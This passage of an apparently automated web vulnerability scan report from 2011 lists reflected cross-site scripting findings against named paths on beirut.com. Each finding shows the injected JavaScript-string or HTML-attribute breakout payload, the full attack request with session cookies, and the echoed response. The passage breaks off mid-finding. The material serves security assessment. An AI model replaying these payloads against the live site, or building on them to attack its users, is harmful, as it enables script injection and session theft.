Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:57:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Restaurants4bf65'-alert(1)-'772924dfe28/Bakeries';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.698. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09ec"><a>5ea38197ead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsd09ec"><a>5ea38197ead/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsd09ec"><a>5ea38197ead">
...[SNIP]...

4.699. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b076d'-alert(1)-'dd85d848931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Bakeriesb076d'-alert(1)-'dd85d848931/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Bakeriesb076d'-alert(1)-'dd85d848931';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.700. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f782"><a>3e05360c623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants7f782"><a>3e05360c623/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:38:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants7f782"><a>3e05360c623">
...[SNIP]...

4.701. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a80c9'-alert(1)-'cba51ac81f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurantsa80c9'-alert(1)-'cba51ac81f4/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurantsa80c9'-alert(1)-'cba51ac81f4/Cafes';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.702. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1ec7'-alert(1)-'e04c5a35b8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Cafesd1ec7'-alert(1)-'e04c5a35b8b/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:50:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Cafesd1ec7'-alert(1)-'e04c5a35b8b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.703. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829cb'-alert(1)-'357f319378e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants829cb'-alert(1)-'357f319378e/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:09:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants829cb'-alert(1)-'357f319378e/Caterers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.704. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aa2"><a>dd5ba344a9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsa3aa2"><a>dd5ba344a9c/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsa3aa2"><a>dd5ba344a9c">
...[SNIP]...

4.705. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ca34'-alert(1)-'d89526939fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Caterers5ca34'-alert(1)-'d89526939fc/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:13:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants/Caterers5ca34'-alert(1)-'d89526939fc';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.706. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 454a7"><a>25a1267588b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants454a7"><a>25a1267588b/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants454a7"><a>25a1267588b">
...[SNIP]...

4.707. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32920'-alert(1)-'e8c6b429882 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants32920'-alert(1)-'e8c6b429882/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:45:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Restaurants32920'-alert(1)-'e8c6b429882/Dining';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.708. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c046a'-alert(1)-'2c4e79b57ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants/Diningc046a'-alert(1)-'2c4e79b57ff/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:49:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Diningc046a'-alert(1)-'2c4e79b57ff';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.709. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87bd8"><a>b7211b4e85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants87bd8"><a>b7211b4e85/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants87bd8"><a>b7211b4e85">
...[SNIP]...

4.710. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fb93'-alert(1)-'64c467db7a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants4fb93'-alert(1)-'64c467db7a1/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:50:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants4fb93'-alert(1)-'64c467db7a1/Health-and-Diet-Shops';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.711. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Health-and-Diet-Shops/34430696

Issue detail

